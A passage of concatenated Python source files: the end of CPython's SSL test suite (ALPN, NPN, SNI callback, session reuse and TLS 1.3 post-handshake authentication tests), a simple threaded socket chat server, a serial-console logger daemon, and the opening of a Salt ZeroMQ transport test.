chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
if (expected is None and IS_OPENSSL_1_1_0
and ssl.OPENSSL_VERSION_INFO < (1, 1, 0, 6)):
# OpenSSL 1.1.0 to 1.1.0e raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_npn_protocols(server_protocols)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
expected_algs = [
"AES256", "AES-256",
# TLS 1.3 ciphers are always enabled
"TLS_CHACHA20", "TLS_AES",
]
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not any(alg in name for alg in expected_algs):
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
client_context, server_context, hostname = testing_context()
# TODO: sessions aren't compatible with TLSv1.3 yet
client_context.options |= ssl.OP_NO_TLSv1_3
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
if ssl.OPENSSL_VERSION_INFO > (1, 0, 1):
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLSv1.3
client_context.options |= ssl.OP_NO_TLSv1_3
client_context2.options |= ssl.OP_NO_TLSv1_3
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
@unittest.skipUnless(ssl.HAS_TLSv1_3, "Test needs TLS 1.3")
class TestPostHandshakeAuth(unittest.TestCase):
def test_pha_setter(self):
protocols = [
ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS_SERVER, ssl.PROTOCOL_TLS_CLIENT
]
for protocol in protocols:
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.post_handshake_auth = True
self.assertEqual(ctx.post_handshake_auth, True)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, True)
ctx.post_handshake_auth = False
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.post_handshake_auth = True
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
self.assertEqual(ctx.post_handshake_auth, True)
def test_pha_required(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA method just returns true when cert is already available
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'GETCERT')
cert_text = s.recv(4096).decode('us-ascii')
self.assertIn('Python Software Foundation CA', cert_text)
def test_pha_required_nocert(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'PHA')
# receive CertificateRequest
self.assertEqual(s.recv(1024), b'OK\n')
# send empty Certificate + Finish
s.write(b'HASCERT')
# receive alert
with self.assertRaisesRegex(
ssl.SSLError,
'tlsv13 alert certificate required'):
s.recv(1024)
def test_pha_optional(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# check CERT_OPTIONAL
server_context.verify_mode = ssl.CERT_OPTIONAL
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_optional_nocert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_OPTIONAL
client_context.post_handshake_auth = True
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
# optional doens't fail when client does not have a cert
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
def test_pha_no_pha_client(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with self.assertRaisesRegex(ssl.SSLError, 'not server'):
s.verify_client_post_handshake()
s.write(b'PHA')
self.assertIn(b'extension not received', s.recv(1024))
def test_pha_no_pha_server(self):
# server doesn't have PHA enabled, cert is requested in handshake
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA doesn't fail if there is already a cert
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_not_tls13(self):
# TLS 1.2
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# PHA fails for TLS != 1.3
s.write(b'PHA')
self.assertIn(b'WRONG_SSL_VERSION', s.recv(1024))
def test_main(verbose=False):
if support.verbose:
import warnings
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
with warnings.catch_warnings():
warnings.filterwarnings(
'ignore',
r'dist\(\) and linux_distribution\(\) '
'functions are deprecated .*',
DeprecationWarning,
)
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SSLObjectTests, SimpleBackgroundTests, ThreadedTests,
TestPostHandshakeAuth
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
thread_info = support.threading_setup()
try:
support.run_unittest(*tests)
finally:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
Py_chat_server.py
|
import socket
import threading
HOST = ''
PORT = 8888
ADDR = (HOST, PORT)
buff_size = 1024
clients = {}
addresses = {}
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(ADDR)
def handle_connection():
while True:
client, client_address = s.accept()
client.send(bytes('welcome', 'utf8'))
print("Connection from %s:%s" %client_address)
threading.Thread(target=handle_client, args=(client,)).start()
addresses[client] = client_address
def handle_client(client):
client.send(bytes('Please enter your name', 'utf8'))
name = client.recv(buff_size).decode('utf8')
clients[client] = name
msg = "Server:" + "Welcome, " + name + "!"
broadcast(msg)
while True:
try:
msg = client.recv(buff_size).decode("utf8")
msg = name + ":" + msg
broadcast(msg)
except :
print('Client %s closed connection' %clients[client])
break;
def broadcast(msg):
for sock in clients:
sock.send(bytes(msg, 'utf8'))
if __name__ == "__main__":
s.listen(5)
print("Waiting for connection...")
main_thread = threading.Thread(target=handle_connection)
main_thread.start()
main_thread.join()
s.close()
|
cm_logger.py
|
#! /usr/bin/python3
#
# Copyright (c) 2017 Intel Corporation
#
# SPDX-License-Identifier: Apache-2.0
#
import errno
import logging
import multiprocessing
import os
import select
import time
import traceback
import serial
_spec_queue = None
def _spec_open_one(spec):
if isinstance(spec, str):
descr = serial.serial_for_url(spec)
descr.nonblocking()
return descr
elif isinstance(spec, dict):
# We have to remove the port thing for passing to the
# function, but we want to keep the original spec intact
_spec = dict(spec)
url = _spec.pop('port')
descr = serial.serial_for_url(url, **_spec)
descr.nonblocking()
return descr
else:
raise RuntimeError("Don't know how to open: %s" % spec)
def _spec_open(spec):
t0 = time.time()
timeout = 10
while True:
try:
t = time.time()
descr = _spec_open_one(spec)
logging.debug("open waited %.2fs for '%s' to appear",
t - t0, spec)
return descr
except (serial.SerialException, OSError) as e:
if t - t0 >= timeout:
logging.error("timeout (%.1fs) trying to open %s: %s",
timeout, spec, e)
raise
if e.errno == errno.ENOENT or e.errno == errno.EBUSY:
logging.debug("open waiting for '%s' to appear: %s",
spec, e)
time.sleep(0.25)
continue
logging.error("cannot open '%s': %s", spec, e)
return None
except Exception as e:
logging.error("cannot open '%s': %s", spec, e)
raise
reader_dict = dict()
poller = None
def _reopen(spec, logfile_name):
global reader_dict
global poller
logfile = open(logfile_name, "wb") # Open truncating
descr = _spec_open(spec)
if descr == None:
return -1
logging.debug("fd %d[%s/%d]: (re)opened: %s",
descr.fileno(), logfile_name, logfile.fileno(), spec)
reader_dict[descr.fileno()] = (spec, logfile, descr)
poller.register(descr.fileno(),
select.POLLIN | select.POLLPRI \
| select.POLLERR | select.POLLHUP | select.POLLNVAL)
return descr.fileno()
def _write(fd, data, filename):
global reader_dict
global poller
if data:
logging.log(6, "fd %d: writing : \"%s\"", fd, data)
os.write(fd, data)
else:
logging.log(6, "fd %d: writing file contents: \"%s\"", fd, filename)
with open(filename, "rb") as f:
# FIXME: use sendfile, this won't work for big files, obvs.
os.write(fd, f.read())
def _reset(fd):
global reader_dict
spec = reader_dict[fd][0]
logfile = reader_dict[fd][1]
logfile_name = logfile.name
try:
logfile_fileno = logfile.fileno()
except ValueError as e:
logfile_fileno = -1
try:
while True:
s = os.read(fd, 1024) # Flush the input channel
if s == None:
l = -1
else:
l = len(s)
logging.log(6, "fd %d[%s/%d]: flushed (%dB): %s",
fd, logfile_name, logfile_fileno, l, s)
# FIXME: stop after so
# much stuff flushed, that
# means the target DID NOT
# stop or something is
# wrong
if s == None or l <= 0:
break
except OSError as e:
logging.info("fd %d[%s/%d]: flush error, reopening: %s",
fd, logfile_name, logfile_fileno, e)
# It's easier to just close and re-open everyhing
_close(fd)
fd =_reopen(spec, logfile.name)
logfile = reader_dict[fd][1]
logging.debug("fd %d[%s/%d]: reset logger",
fd, logfile.name, logfile.fileno())
def _close(fd):
global reader_dict
global poller
spec = reader_dict[fd][0]
logfile = reader_dict[fd][1]
descr = reader_dict[fd][2]
try:
logfile_fileno = logfile.fileno()
except ValueError as e:
logfile_fileno = -1
logfile.close()
try:
poller.unregister(fd)
except KeyError:
pass
try:
descr.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
logging.debug("fd %d[%s/%d]: ignoring -EBADF on close()",
fd, logfile.name, logfile_fileno)
logging.debug("fd %d[%s/%d]: removed reader",
fd, logfile.name, logfile_fileno)
del spec
del descr
del logfile
del reader_dict[fd]
#
# This thread reads from all the file descriptors (normally describing
# serial consoles) given to the daemon. Note the daemon itself is the
# one that has to open the file descriptor, otherwise it might be
# another process.
#
def _reader_fn():
global _spec_queue
global reader_dict
global poller
poller = select.poll()
queue_fd = _spec_queue._reader.fileno()
logging.info("console logger thread")
while True:
try: # Make sure it is there (in
poller.register(queue_fd) # case an error took it out)
rs = poller.poll(1000) # Wait for activity
for r in rs: # Process said activity
fd = r[0]
# Handle management events first
if fd == queue_fd: # Read and discard
logging.log(8, "QUEUE fd %d, signalled 0x%x", fd, r[1])
o = _spec_queue.get_nowait()# just used to run the
if o == None:
logging.warning("QUEUE: woken up, but got nothing")
continue
logfile_name = o[1]
try:
if o[0] == 'add':
spec = o[2]
_reopen(spec, logfile_name)
elif o[0] == 'write':
for fd in list(reader_dict.keys()):
if reader_dict[fd][1].name == logfile_name:
_write(fd, o[2], o[3])
elif o[0] == 'rm':
for fd in list(reader_dict.keys()):
if reader_dict[fd][1].name == logfile_name:
_close(fd)
break
elif o[0] == 'reset':
for fd in list(reader_dict.keys()):
if reader_dict[fd][1].name == logfile_name:
_reset(fd)
break
else:
raise ValueError("Unknown action '%s'" % o[0])
finally:
_spec_queue.task_done()
del o
continue # Process next change
if not fd in reader_dict:
logging.debug("fd %d has been removed: 0x%x", fd, r[1])
continue
spec = reader_dict[fd][0]
logfile = reader_dict[fd][1]
logfile_name = logfile.name
try:
logfile_fileno = logfile.fileno()
except ValueError as e:
# If closed, just pass it on
logfile_fileno = -1
if r[1] in (select.POLLERR, select.POLLHUP, select.POLLNVAL):
# Something is wrong, let it be refreshed; be
# loud, normally this means something bad has
# happened to the HW or a lurking bug (file has
# been closed somehow).
logging.warning(
"BUG? fd %d[%s/%d]: has to be removed: 0x%x",
fd, logfile_name, logfile_fileno, r[1])
_close(fd)
_reopen(spec, logfile_name)
elif r[1] == select.POLLIN or r[1] == select.POLLPRI:
# Data is available, read in 1K chunks and record
# it [FIXME: consider using sendfile()].
try:
data = os.read(fd, 1024)
logging.log(7, "fd %d[%s/%d]: Read %dB: %s",
fd, logfile_name, logfile_fileno,
len(data), data)
except OSError as e:
logging.error(
"fd %d[%s/%d]: log read error, reopening: %s",
fd, logfile_name, logfile_fileno, e)
_close(fd)
_reopen(spec, logfile_name)
data = "[some data might have been lost]"
try:
os.write(logfile_fileno, data)
except OSError as e:
logging.error("fd %d[%s/%d]: log write error: %s",
fd, logfile_name, logfile_fileno, e)
del data # Ensure data it is gone
elif r[1] == errno.ENOTTY:
logging.info("fd %d[%s/%d]: reopen due to ENOTTY, "
"device replugging?",
fd, logfile_name, logfile_fileno)
_close(fd)
_reopen(spec, logfile_name)
else: # Me not know what you talking'bout
if r[1] != errno.ENODEV:
logging.error(
"fd %d[%s/%d]: Unhandled poll reason 0x%x",
fd, logfile_name, logfile_fileno, r[1])
else:
logging.info("fd %d[%s/%d]: device disconnected",
fd, logfile_name, logfile_fileno)
_close(fd)
# We do not reopen, usually this means the device is gone
except Exception as e:
logging.error("Unhandled reader thread exception: %s: %s",
e, traceback.format_exc())
def setup():
"""
FIXME
"""
global _spec_queue
_spec_queue = multiprocessing.JoinableQueue(100)
# Background thread that reads from all serial ports to a log file
reader = multiprocessing.Process(target = _reader_fn)
reader.daemon = True
reader.start()
logging.info("console logger launched")
# This to be ran by the master or other processes in the
# multiprocessing pool
def spec_add(logfile_name, spec):
"""
FIXME
"""
assert isinstance(logfile_name, str)
assert isinstance(spec, dict)
global _spec_queue
if _spec_queue == None:
setup()
# wait here for the node to show up -- we'll also do it in the
# loop for double checking, but here we don't block anyone and if
# it fails, we can tell the caller -- otherwise, just proceed for
# cm_logger to open it (for which we have to delete it again)
# We can't open it and pass it to the caller because it is another
# process.
descr = _spec_open(spec)
if descr != None:
descr.close()
del descr
else:
raise RuntimeError("Cannot open serial port (%s); is "
"ModemManager trying to scan it?" % spec)
_spec_queue.put(['add', logfile_name, spec])
_spec_queue.join()
logging.debug("%s: adding logger for '%s'", logfile_name, spec)
def spec_write(logfile_name, data = None, filename = None):
"""
Write to a file descriptor monitored by a logger
:param str logfile_name: Name of the logger to which file
descriptor to write to
:param data: data to be written; use this only for short amounts
of data
:param str filename: name of the file that contains the data that
has to be written, use this for longer data.
"""
global _spec_queue
# Either one has to be given, but not both
assert (data == None) != (filename == None)
_spec_queue.put(['write', logfile_name, data, filename])
_spec_queue.join()
logging.debug("%s: wrote to logger", logfile_name)
# This is to be ran by the master or other processes in the
# multiprocessing pool
def spec_rm(logfile_name):
global _spec_queue
_spec_queue.put(['rm', logfile_name])
_spec_queue.join()
logging.debug("%s: removing logger", logfile_name)
# This is to be ran by the master or other processes in the
# multiprocessing pool
def spec_reset(logfile_name):
global _spec_queue
logging.debug("%s: resetting logger", logfile_name)
_spec_queue.put(['reset', logfile_name])
_spec_queue.join()
# Wait for queue to be flushed?
logging.debug("%s: reset logger completed", logfile_name)
|
test_zeromq.py
|
"""
:codeauthor: Thomas Jackson <jacksontj.89@gmail.com>
"""
import ctypes
import multiprocessing
import os
import threading
import time
from concurrent.futures.thread import ThreadPoolExecutor
import salt.config
import salt.exceptions
import salt.ext.tornado.gen
import salt.ext.tornado.ioloop
import salt.log.setup
import salt.transport.client
import salt.transport.server
import salt.utils.platform
import salt.utils.process
import salt.utils.stringutils
import zmq.eventloop.ioloop
from salt.ext.tornado.testing import AsyncTestCase
from salt.transport.zeromq import AsyncReqMessageClientPool
from saltfactories.utils.ports import get_unused_localhost_port
from tests.support.helpers import flaky, not_runs_on, slowTest
from tests.support.mixins import AdaptedConfigurationTestCaseMixin
from tests.support.mock import MagicMock, call, patch
from tests.support.runtests import RUNTIME_VARS
from tests.support.unit import TestCase, skipIf
from tests.unit.transport.mixins import (
PubChannelMixin,
ReqChannelMixin,
run_loop_in_thread,
)
x = "fix pre"
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, "ZMQIOLoop"):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
class BaseZMQReqCase(TestCase, AdaptedConfigurationTestCaseMixin):
"""
Test the req server/client pair
"""
@classmethod
def setUpClass(cls):
if not hasattr(cls, "_handle_payload"):
return
ret_port = get_unused_localhost_port()
publish_port = get_unused_localhost_port()
tcp_master_pub_port = get_unused_localhost_port()
tcp_master_pull_port = get_unused_localhost_port()
tcp_master_publish_pull = get_unused_localhost_port()
tcp_master_workers = get_unused_localhost_port()
cls.master_config = cls.get_temp_config(
"master",
**{
"transport": "zeromq",
"auto_accept": True,
"ret_port": ret_port,
"publish_port": publish_port,
"tcp_master_pub_port": tcp_master_pub_port,
"tcp_master_pull_port": tcp_master_pull_port,
"tcp_master_publish_pull": tcp_master_publish_pull,
"tcp_master_workers": tcp_master_workers,
}
)
cls.minion_config = cls.get_temp_config(
"minion",
**{
"transport": "zeromq",
"master_ip": "127.0.0.1",
"master_port": ret_port,
"auth_timeout": 5,
"auth_tries": 1,
"master_uri": "tcp://127.0.0.1:{}".format(ret_port),
}
)
cls.process_manager = salt.utils.process.ProcessManager(
name="ReqServer_ProcessManager"
)
cls.server_channel = salt.transport.server.ReqServerChannel.factory(
cls.master_config
)
cls.server_channel.pre_fork(cls.process_manager)
cls.io_loop = salt.ext.tornado.ioloop.IOLoop()
cls.evt = threading.Event()
cls.server_channel.post_fork(cls._handle_payload, io_loop=cls.io_loop)
cls.server_thread = threading.Thread(
target=run_loop_in_thread, args=(cls.io_loop, cls.evt)
)
cls.server_thread.start()
@classmethod
def tearDownClass(cls):
if not hasattr(cls, "_handle_payload"):
return
# Attempting to kill the children hangs the test suite.
# Let the test suite handle this instead.
cls.process_manager.stop_restarting()
cls.process_manager.kill_children()
cls.evt.set()
cls.server_thread.join()
time.sleep(
2
) # Give the procs a chance to fully close before we stop the io_loop
cls.server_channel.close()
del cls.server_channel
del cls.io_loop
del cls.process_manager
del cls.server_thread
del cls.master_config
del cls.minion_config
@classmethod
def _handle_payload(cls, payload):
"""
